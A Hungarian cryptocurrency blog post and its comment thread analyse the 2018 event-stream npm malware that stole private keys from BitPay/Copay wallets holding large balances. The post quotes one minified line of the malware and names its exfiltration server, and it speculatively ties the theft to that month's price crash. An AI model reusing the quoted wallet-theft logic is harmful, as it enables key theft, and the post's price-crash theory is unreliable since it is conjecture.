Gyerekcipő…

Sokszor illetjük a cryptopiacokat azzal a jelzővel, hogy mennyire gyerekcipőben járnak még és a kiforratlansága okán nagyon sok kár érheti a gyanútlan felhasználókat… pedig valóban ez a kiforratlanság nem cryptospecifikus, az Internet és annak technológiái olyan szinten gyorsan fejlődnek, hogy ami ma még gyerekcipőben járó újdonság, az holnapra már elunt és kihal szemétdomb lesz csak. Erre keresve sem lehetne jobb példát mutatni eme cikk témájánál.

Néha komolyan elgondolkodom, hogy mi is hajt abban, hogy blogoljak a crypto témában, hiszen itt nem történik semmi. Az árfolyamok is csak vagy felfelé száguldoznak, vagy lefelé zuhannak. Persze vannak jó dolgok is, de igazából azokkal is csak a jéghegy csúcsát kapargatjuk. Majd egyszer csak történik valami meglepő és ráébredek, hogy miért is blogolok: azért mert olyan szinten hihetetlen az ami itt nap mint nap történik, hogy az ember kénytelen azt kiírni magából.

Az elmúlt hetekben két nagyon fontos és látványos dolog történt, amire jómagam is ráfókuszáltam: A híres neves bch hashwar és ugye a jelentős árfolyamzuhanás ami kapcsán a BTC árfolyama alig egy hét alatt dropolt 40%-ot, ami azért még a magamfajta flashcrasheken edződött “veteránnak” is sokkoló volt. Az egészben az izgalmas kibogozni a történetek mögött meghúzódó fura történetszálakat. Mi kell ahhoz, hogy egy egyébként lassú növekedés hipersebességre kapcsoljon? (ICOk) Mi kell ahhoz, hogy a növekedés ne törjön meg a dumpolásokkal? (Tether) Miért tetőzik az árfolyam pont 19k körül (hülye kerek számok + karácsonyi news adaptáció), miért törik meg és tesztel vissza 6,5k-n az árfolyam majd egy évig a bezuhanás előtt? (fibo+kapituláció) És még hosszan lehete sorolni ezeket a történeteket. Persze mikroszinten is vannak igazán izgalmas témák, lásd tavaly a BCH hardfork, vagy az az követő megannyi sikertelen flipening try.

És akkor eljutunk szépen lassan az idei nov 15-höz, ahol is összecsaptak az elementáris erők és a nagy hashwar keretei között a “dögöljön meg a szomszéd tehene” elvet vallva… szépen kinyírták maguk körül a piacot, hiszen pont ezt ígérték…

Vagy mégsem? Lehet, hogy a nagy színház mögött valójában egy teljesen banális történet húzódik meg és újra kiderül, hogy nincs itt semmi nagy összeesküvés és világmegváltó kísérlet, csak egyesek megint jókor jó helyen próbálták előadni, hogy mekkora sztárok és egyszerűen csak bemákolták a dolgot?

Nos úgy néz ki, hogy Jihan és CSW kakasviadalába valaki(k) nagyon belerondított(ak). Olyan szinten, hogy az feltételezhetően még a két ellenérdekelt felet is meglepte és nem kizárt, hogy a hirtlen fegyverletétel is ennek az eseménynek köszönhető.

A újabb mozaikkal 3 napja találkoztam egy twitter bejegyzés kapcsán, amikor is szint azonnal blogbejegyzést akartam róla írni, de úgy voltam vele, hogy előbb had tisztuljon a kép. Mára végre ki is tisztult…

Néhány napja került elő egy nagyon fura AES kódolt malware az egyik népszerű node.js projektben, egészen pontosan az event-streamben:

Az encrypted payload kidobozásához relatív sok idő kellett, de tegnapra már egészen biztos volt, hogy valamilyen cryptocurrency érintett kód lehet benne, ami a BitPay/CoPay népszerű payment provider alkalmazásokhoz kapcsolódik.

Ezen a ponton fontos megjegyezni, hogy a kérdéses NPM filenak semmi köze nincs a cryptovilághoz. Ez a library a teljes node.js univerzum egyik alapköve, napi szinten több százezerszer töltik le különböző projektek lefordításához. A helyzet úgy alakul, hogy az “event-stream” fejlesztője (dominictarr) egy jó ideje már nem fejleszti az event-streamet és nemrégiben jelentkezett nála egy “right9ctrl” nevű github felhasználó, hogy szívesen átvenné a repo karbantartását, amit dominic minden gond nélkül át is adott. A karbantartásból annyi lett, hogy bekerült a malware kód a libraryba (hogy egészen pontos legyek right9ctrl behivatkozott egy másik libet (flatmap-stream), ami a malwaret tartalmazta.

Oké, nézzük mi is ez a malware: Mivel egy eléggé komplex trükközésről van szó és egészen sokáig inkább a tűzoltással foglalkozott mindenki, ezért lényegében csak tegnapra derült ki, hogy pontosan mit is csinál az injektált malware kód. A kód legszebb része:

t.balance = parseFloat(e.balance.split(" ")[0]), "btc" == t.coin && t.balance < 100 || "bch" == t.coin && t.balance < 1e3 || (global.CSSMap[t.xPubKey] = !0, r("c", JSON.stringify(t)))

A rosszindulatú kód belehívott a BitPay/CoPay profilejába (Credentials.getKeys) és megnézte, hogy van-e ott legalább 100 BTC-t, vagy 1000 BCH-t tartalmazó wallet, ha igen, akkor nemes egyszerűséggel elküldte a privát kulcsot egy Kuala Lumpur-i (111.90.151.134) szerver 8000-es portján figyelő szolgáltatásnak.

Közeledünk a konklúzióhoz… A kérdéses malware payloadet right9ctrl szeptember 9-én commitolta az event-stream libraryba és azóta várakozott, hogy végre készítsem egy új buildet a BitPay/CoPay. Ez majd 2 hónap múlva meg is történt (ami alatt senki az égvilágon nem vette észre a beágyazott kódot…), amikor is november 13-án éjszaka végre kihozta a BitPay v5.0.2 stabil buildet és hogy mi történt nem sokkal ezután a piacokon. Mutatom:

Alig 12 órával a BitPay release után már be is szakadt az árfolyam 1000 dollárt, majd 3 napnyi szünet után szinte azonnal további 1500 dollárt. A nagyobb szakadások szabályszerűsége arra enged következtetni, hogy a támadó kötegelten dolgozta fel a privát kulcsokat, amibe bejátszott az is, hogy a felhasználók is csak a release után némi idővel (napokkal) rakják fel az újabb verziókat.

Hogy mennyit lopott el a támadó és mennyit dumpolt le? Erről egyelőre mégcsak találgatások vannak. De azok hajmeresztőek…

Illő lenne így a cikk végére valami konklúziót összerakni: Egyrészt a támadó nagyon alapos munkát végzett. Volt itt minden, social engineering (dominic megtévesztése), aes256 payload összerakása, copay lib visszafejtése és a tesztelés, kuala lumpuri szerver bérlés, a begyűjtött privát kulcsok dumpolása és flash cashout tőzsdéken, amihez tippre a hamisan KYC-zott  usereket már jó előre létrehozta, de a legérdekesebb, hogy eleve csak a nagyhalakra ment, csak azon walleteket dumpolta, amiben legalább 100 BTC és 1000 BCH állt, szóval eleve kizárta a “kispénzek” lenyúlását, hogy ezzel is – feltételezem – maximalizálja a bevételt. Ráadásul ezt az egészet két hónapon keresztül fenntartotta, mire aratni tudott. A hab a tortán már csak az volt, hogy a BitPay pont aznap hozta ki a hackelt libet, amikor indult a hashwar… szóval lényegében úgy tudta dumpolni a teljes ellopott vagyont, hogy ezen lényegében senki nem is csodálkozott, hiszen… lényegében pont ezt is vártuk. Ha megéri a Bitcoin, hogy olyan filmek készüljenek róla mint a “Margin Call” vagy a “Too Big To Fail”… akkor biztosra veszem, hogy ez a kis történt fog kapni néhány jelenetet.

Hogy mi múlott ezen?

  • Túl majd 3000 dolláros árfolyam zuhanáson és az ezáltal okozott újabb sokkon és brutális bizalomvesztésen…
  • A Bakkt 4 napja bejelentette, hogy elhalasztja a Bitcoin Futures bevezetését és feltehetően csak 2019Q1-ben rukkol elő ezzel
  • Egyes pletykák szerint a szinte már biztosra vehető Bitcoin ETF kapcsán is  komoly kételyek merültek fel újra
  • A nagy hashwarból sem lett semmi. Ahelyett, hogy a két fél hónapokon keresztül gyilkolta volna egymást alig 1 hét alatt kapitulált mindkét oldal és most két walking dead cammog a Bitcoin Cashesebb oldalán ezzel végtelen mennyiségű popcornt hagyva elfogyasztatlanul.

Cserébe viszont volt egy Crypto Black Fridayünk…

 

 

Bookmark the permalink.

59 Comments

  1. Köszi, sokat tisztult a kép.

  2. Akkor így már érthető a Krakenen történt dump is: https://variance.hu/2018/11/22/sign-of-capitulation/
    ami az ő szemszögéből már nagyon is helyes üzleti döntésnek tűnik. :/
    Köszi a postot!

  3. Apró kiegészítés:
    1e3 = 483, nem 1000
    az
    ” || (global.CSSMap[t.xPubKey] = !0 ”
    részből pedig nem lehet arra következtetni, hogy minden pubkeynek amit talált megszerezte a privát kulcsát?
    Ha && operátort használt volna fel sem merül, de ott egy OR van. 😐

    • 1E3 is 10 to the third power, or 1000

      • yep. Egyébként az eredeti kódban ott valószínűleg 1000 szerepelt, de a javascript minify automatikusan cseréli az 1000-et 1e3-ra hiszen az csak 3 karakter, szemben a 4 karakteres ezerrel.

    • 1*10^3, az 1000. nincs semmi lootos iras.
      a vagyolasok, meg egy trukkos if+cmd+if+cmd+if+cmd megvalositas. (az && erosebb mint a || operator), a cssmap-ban tarolta hogy milyen pubkey-eket ismer (a “= !0” egy sima ertekadas)

  4. Aztaaa!

  5. Árfolyam szempontból: vajon van-e még a tarsolyába nem-dumpolt mennyiség, és vajon még hányan indítják el még most a hekkelt verziót?

    Hogytudottműködni: Ha ez igaz, sokan nagyobb mennyiségű kriptót tartanak (copay) hot walletben, és sokáig nem tűnik fel nekik, ha eltűnik az egyenlegük… bár ez érthető.
    A CoPay jó kis wallet, egyik előnye, hogy tud testnetet is — lehet hogy kedves hekker is ott tesztelte művét 🙂

    Hihetetlen… de a commit tényleg ott van GitHubon. https://github.com/dominictarr/event-stream/issues/116

  6. Én úgy gondolom, hogy az ETF megint el lesz halasztva, igy az árban lesz még egy esés, 2-3k között valahol. Ti ezt, hogy látjátok most?

  7. nekem elképszetően ijesztő hozzánemértést és fel-nem-fogást jelent, hogy valaki ezer (!!!!) btc-t tart egy olyan számlán, aminek privát kulcsát a saját gépéről így titkosítatlanul el lehet lopni.
    Nem azt mondom, hogy megérdemelték, de ennyire elképesztően hanyagnak lenni a biztonsággal?

  8. Egyrészt nagyon köszönöm a postot! Másrészt technikailag le a kalappal hogy ezt megcsinálta(ták). Harmadrészt azért szívesen végignézném ahogy felkoncolja a crypto társadalom, pláne aki 15e körül vásárolt…

  9. nem használtam copay walletet, de jól értem, hogy copay walletben nincs ez a feature ami pl electrumban van? (faq-jukból nem derül ki)
    “Your seed and private keys are encrypted using AES-256-CBC. The private keys are decrypted only briefly, when you need to sign a transaction; for this you need to enter your password. This is done in order to minimize the amount of time during which sensitive information is unencrypted in your computer’s memory.”

    • a cucc, a gopay getkeys fuggvenyet hookolta, amit valszeg akkor hasznalnak amikor egy privkeyre szukseg van pl alairaskor. a tamado nem egyszerre nyerte ki a kulcsokat, hanem akkor amikor az user hasznalta oket.

      itt azert befigyel hogy eloszor az usert ra kellett venni arra hogy hasznalja a kulcsot, pl panicsell-re kuldje be egy reszet valtohoz, ahhoz meg kell egy kis dump

      • és más wallet dev-ek nem használták ezt? fura de nem sikerül googleben egyértelmű listát találnom melyek a javascript alapu walletek s melyek amiket így, open source, nodejs-el fejlesztgetnek?!

        • Az injectiont konkréten a BitPay/CoPay egyik class hívása váltotta ki. Szóval a malware konkrétan csak erre a walletre készült.

  10. Kreatív volt és kellőképp türelmes.

  11. Üdv
    Ez nagyon alapos magyarázat volt az egészre és szivesen megosztanám az infokat magyarul nem ertő kolegékal.Tudnél e adni pár linket angol nyelven amit meg tudnék osztani velük.Mostmár kezdem érteni a BCH vagy a Binancon BCC értéke a Hard Fork után miert let BCHAB+BCHSV=BCH-100+valamenyi USD.Elég szomorú hogy igy szivattak meg minket.Binancenal ez meg nem volt elég hanem meg volt egy 24 órás banolás is binancetol ilyen űzenetel hogy “Based on the KYC information you provided, we are sorry to inform you that Binance is not able to provide service in our country/area, please withdraw your crypto assest now” azt ne mondjam hogy kozben aki BCHABCben volt meg BCHSV ben az nem birt tradelni de viszont a BCHABC es BCHSV walletokon withdraw pedig nem műkodott koszonet ennek meg egy 50 usds minusz lett volna.

  12. Van forrás arra vonatkozóan, hogy ezt az exploitot tényleg ki is használták, vagy ez csak feltételezés? (én egyelőre nem találtam)

  13. https://www.bitcoinbazis.hu/malware-kerult-a-bitpay-copay-tarcajaba/

    Ezek szerint a bitpay tagadja, hogy sikerült volna a művelet? Vagy akkor most mi van?

    • Valójában ez a hivatalos állásfoglalás a BitPay részéről, ami nem pont ezt tartalmazza: “Currently we have only confirmed that the malicious code was deployed on versions 5.0.2 through 5.1.0 of our Copay and BitPay apps. However, the BitPay app was not vulnerable to the malicious code. We are still investigating whether this code vulnerability was ever exploited against Copay users.”
      https://blog.bitpay.com/npm-package-vulnerability-copay/

  14. Köszi, a letörés óta a leginkább informatív írás, amivel találkoztam!

  15. Tehát a blokklánc a legbiztonságosabb rendszer a világon.Annyi hitelesítésen kell átesni, hogy a csalás kizárt.Elég szomorú, hogy másról sem szólt ez a 2 év, mint az örökös hack és lopások sorozata.

    • A szélhámosoknak, bűnözőknek “mindegy”, hogy arany vagy kripto. A kriptohoz sem ért az átlag ember az aranyhoz sem. Azonban a kriptoval jobban lehet hülyíteni és a lebukás veszély is kisebb mert személyes kapcsolatra sincs szükség.

      A blokklánc nyilvántartás olyan mint az aranynak a fizikai/kémiai tulajdonsága. Nem tudod megváltoztatni. Az elmúlt időszak alatt nem volt rá ismert példa. Például a ethereum is a változtathatatlanság okán szakadt ketté.

      Az arany helyett is eladnak sárgarezet, rabolnak bankot, törnek fel széfeket még a SWIFT nemzetközi pénzátutalás rendszert is meghackelték. Az “elmúlt 2 év” ezekről is szólt, – sajnos -, de a média ingerküszöbét már egy sima lopás, zsebmetszés már nem éri el. Sok szereplőnek érdeke a kriptoellenes hangulat szítása.

      Hasonló a helyzet mint amikor a fasiszta propaganda TV-ben a migráncsos terroristákról, gyilkosokról hadoválnak, és ettől fél mindenki, de szemérmesen elhallgatják:
      ” … Magyarországon az elérhető statisztikák szerint havonta legalább 3 nőt meggyilkol férje vagy volt férje, élettársa vagy volt élettársa, barátja vagy volt barátja, alkalmi partnere. …”

      • A statisztikak szerint msgyarorszagon az autobalesetek 90%a gyorshajtas miatt törtènik. Mit szür le ebböl a külsö szemlèlõ: aha 130 nal 210el repül az ember pedig 50%ban 100al halado auto ütközik bele egy 60al araszolo sorba es ez gyorshajtaskent van elkönyvelve. Csak a statisztikak hatalmas pontatlansagat szeretnem ezzel hangsulyozni.

        • Én meg a propagandára. A hazugságokra, álhírekre, csúsztatásokra, figyelem terelésekre. A fontos dolgok mintha nem is léteznének.

          A civilekről csak azt halljuk, hogy soros pénzelte migráncssimogató libsik …
          Mikor volt a hírekben szó mondjuk az eszperantó szövetségről, a modellezőkről, az amatőr rádiósokról, a kórusokról, a táblajáték egyesületről …

          Ha párhuzamokat keresünk:
          Menekültenként több mint 10 millió forintot áldozunk, hogy “be ne jöjjenek”, de mennyi jut az eltűnt gyerekek felkutatására, hány óriásplakáton keresik őket
          “… az eltűnés miatt regisztrált hatályos körözések száma a 2018. április 10-i állapot szerint a fiatalkorúaknál 1726, a 14 év alattiaknál pedig 649. …”

          A HVG, a Portfolió, a PC fórum, – és még hosszasan sorolhatnám a sajtótermékeket, – élvezettel csámcsog a kriptokról szóló negatív híreken, de az ingerküszöbüket nem lépik át a megvalósult fejlesztések, előrelépések.
          Nincs egy pozitív világképük amibe beilleszthetnék és népszerűsíthetnék a blokklánc technológiát. Erre csak ilyen szakmai blogokon bukkanhatunk rá, köszönet érte.

          • ezen nincs mit csodalkozni, a retekklub/tenytelen hirado is teli van megolte/leszurta/meglopta/elhagyta/stbstb hirekkel, allitolag erre van igeny (ez az ingerkuszob), ezt adjak

    • Blokkláncot törtek fel, vagy egy hozzá kapcsolódó rendszert? Biztonságilag fejlődhetnének-e ezek a kapcsolódó szoftverek hack nélkül? Hagyományos banki rendszereknél már megszűntek a nem kívánt behatolások?

  16. Hat igen, az Open Source prjektek nagy “elonye” hogy barki belepiszkalhat… 🙂

  17. Amit èn látok, hogy t. Coin & & t. Balance<100 szoval a 100 btc alatti privatkey es 1000bch alatti privat key volt a celpont nem az a feletti. A masik, hogy githubon azt irjak oktober 28.an reportolva lett ez a kod es javitva lett. Szóval amit ki tudtam szprni az az, hogy a tamadas sikertelen volt. De akkor mi indokolja a hatalmas zuhanast? Csak a hashwar?
    Üdv.

    • A repohoz szeptember vége óta senki nem nyúlt hozzá. A BitPay ráadásul közleményben ismerte el, hogy az 5.0.2-es verziójú BitPay és CoPay-be sikerült befordítania a malware-t, amik nov 14-én jelentek meg.

      • Ez a legviccesebb a github oldalról a hiba alá írja:
        If you’re reading this, it looks like the solution for the moment is to downgrade to 3.3.4 (which does not have the vulnerability) until npm support can grant permission to a new owner who won’t inject compromised packages.

        Szval franc se tudja meddig marad benne 😀 Nice….

    • Tényleg Csaba. Akkor most ez a “kis” tárcákra ment rá vagy a nagyokra?

      • Igen a “kicsikre”, már ha egy 100 BTC alatti tárca kicsinek nevezhető. Sajnos félreértettem ezt a részt a kódban. szóval a 100BTC/1kBCH ALATTI tárcál voltak a célkeresztben.

        • No. Igen. Mindenesetre nem lennék a helyében. Pláne úgy ha a 100 felettiekre ment volna rá. Mert előbb utóbb megtalálják őt fizikailag is. Ha érted mire gondolok 🙂

        • A kod alapjan, pont, hogy a nagyokra ment.

          A && precedenciaja miatt || felett, es amiatt, hogy a || operator csak addig ertekeldoik ki, mig az elso igaz tagot meg nem talaja (short-circuit eval).

          Tehat pl. 99 btc balance eseten a `”btc” == t.coin && t.balance < 100` igazra ertekelodik ki, es a teljes logikai kifejezes true lesz. Ha a balance nagyobb mint 100 btc, akkor a kifejezes hamis, a masodik tag is hamis (mert a t.coin nem "bch"), igy kiertekelodik a harmadik tag is, ami meghivja a rosszindulatu r fuggvennyt.

          Gyors PoC: https://pastebin.com/B6tEe7aZ

        • Én úgy látom, hogy a nagyokra ment rá. Ez a kérdéses kód:

          “btc” == t.coin && t.balance < 100 || "bch" == t.coin && t.balance Az encryptAndSend akkor fut le, ha van legalább 100 btc, vagy 1000 bch.

  18. Ettől most befontam a hajam 😀

  19. Miért nem inkább a háttérhatalom “számláira” ment rá?? 🙂

    • Mert a hatterhatalomnak a btc mellett komoly kontaktok es fiatszamlak vannak Fèlt hogy a megtalalasara forditanak par csilliot. De elvileg nem is sikerült a tamadas.

  20. Nagyot mennek a privacy coinok. Az a sejtésem, hogy a lenyúlt crypto egy része válik most ezáltal láthatatlanná.

    • De elmeletileg nincs lenyult kripto!! A bitpay is azrirta, hogy nincs gáz. Igen bekapták a fertözött node.js t de nem sikerült megszerezni a btct.

  21. A black friday cikkedben ezt írtad: “főleg olyan dolgokat, amik a 20%-kal csökkentett árukkal pont 80%-kal érnek többet, mint ami a reális áruk!” Azaz a cryptókat értékelted nullát érő lufiknak. Ebben a cikkben viszont, mivel egy csalással indította el valaki (állítólag) a lufi kipukkadását, kiderült, hogy nem is lufi. Most megint megy fel az árfolyam. Most akkor érnek a cryptók nullánál többet, vagy csak én értem féle, hogy erre utaltál a jelen cikkel?

    • nem minden cryptora gondol. a blog posztjaiból sokszor kiderül, melyik cyptokat tartja életképesnek (pl btc, eth, stb) és melyek azok amiket nem (bcash, sok sok shitcoin) a fenti mondat utobbiakra vonatkozik.

  22. Csaba ezt tisztázzuk már le. Tegnao egesz nap ezutánn az ûgy utann nyomoztam. A bitpay aztirt nincs gáz e mellett az userek is csenben vannak, azèrt 33000btc nèl lenne lázadás bõven. Twitteren is mindehol csend. A kód sikeres volt bejutott a bitpayhez de nem sikerült bitcoint lopni =az esès nem amiatt volt, hogy az emberünk megszabadult x10000 btctõl!

    • Én minden információt leírtam a postban, amivel rendelkeztem. A Bitpay elismerte, hogy sikerült olyan bitpay/copay-t releaselni amiben benne volt ez a hack. A Bitpaytől nyilván senki nem lopott, hiszen a Bitpay/CoPay esetén a wallet az ügyfélnél van, az ügyfél gépén, telefonján, stb. Tehát a BiPay max csak akkor tud róla, hogyha valakitől lenyúltak pénzt, hogyha azt az ügyfél jelzi. Annyit tudunk, hogy a kérdéses kód nov 14-én releaselődött a bitpaynél és rá egy napra indult a lejtmenet.

  23. Már napok óta ezen a dumpoláson elmélkedek. Szerintem csak véletlen egybeesés, hogy a hackeléssel egy napon történt. Egyszerűen mértani pontossággal pont akkor sikerült ellopni a coinokat amikor mindenki azt várta, hogy fel vagy lefele fog kilőni az ár, nagy volume mellett.
    Ha a nagy bizalomvesztés lett volna a cél és hackeléssel szeretnék rángatni az árat akkor sokkal nagyobb tüzet csiholtak volna és már jó előre lenyúlták volna a pénzeket és várták volna ezeket a kulcsfontosságú időszakokat amikor nagy a pangás a piacon és kb bármelyik irányba megindulhat.
    Ha pedig csak valaki okosba felnyomta a bitpayt mert nem tudott mit kezdeni a szabadidejével nem feltétlenül a dumpolás lenne az első reakciója, bár én el sem tudom képzelni mi járhat az ilyen fejében. Itt a lényeg, hogy egyenlőre nem lehet tudni, hogy melyik címekről vitte a coinokat és hogy tőzsdére küldte -e.

    • Ez mind rendben is van. De ha eltünt volna a rengeteg btc mert 100 vagy 1000 db nem eleg a ekkora lejtöhöz akkor a felhasznalok örjöngenènek twitteren es minden socialmedian ehez kepest csend van mind a bitpay mind a felhasznalok reszeröl. Vèletlen egybeesès lesz ez az áresès esetleg minimalis btct sikerült meglovasitani (globalis szinten) amiröl mèg nem tudunk bár nem hinnèm, hogy lenne olyan user aki bitpaynel rart pl 98 btct es eddig nem vette eszre, hogy eltünt. A hacknek minimalis hatasa lehet az arra az is csak a hirek miatt nem a dumpolt btck szama miatt. Mindezen felül valamilyen szinten hatalmas respect alt9ctrl nek akar robinhood akar nem,es köszönet ismet a variance blognak az informacio megosztasert es a cikkert.

  24. Nem tudom, mi ez az izgalom. Egy BTC, még mindig 1 btc-t ér, akkor hol a hiba?! Kit érdekel ez az elavult fiat pénz, úgysincs már sok neki hátra.

  25. Btc NVT eléggé zuhanórepülésben, már 140, akkor kezdjünk örülni Csaba 🙂

  26. Csaba, ha kérhetem, akkor válaszolj a “November 28, 2018 at 22:30”-i kérdésemre. Köszönöm!

  27. Van ez a rész:

    “btc” == t.coin && t.balance < 100 || "bch" == t.coin && t.balance < 1e3 || (global.CSSMap[t.xPubKey] = !0

    Jól értem, 100 BTC felett és 1000 BCH felett, továbbá bármely egyéb elnevezésű kriptora balance-tól függetlenül küldi a key-t?

    • A Copay tudomásom szerint kizárólagosan a BTC-t támogatja a cryptok közül. Emellett van benne valami BCH nevű cucc is, de az említésre sem méltő különösen amióta a november közepi hardfork kapcsán elég durván megtépázódott.. Ezen kívül nincs tudomásom arról, hogy bármi mást is támogatna a CoPay.

Leave a Reply

Your email address will not be published. Required fields are marked *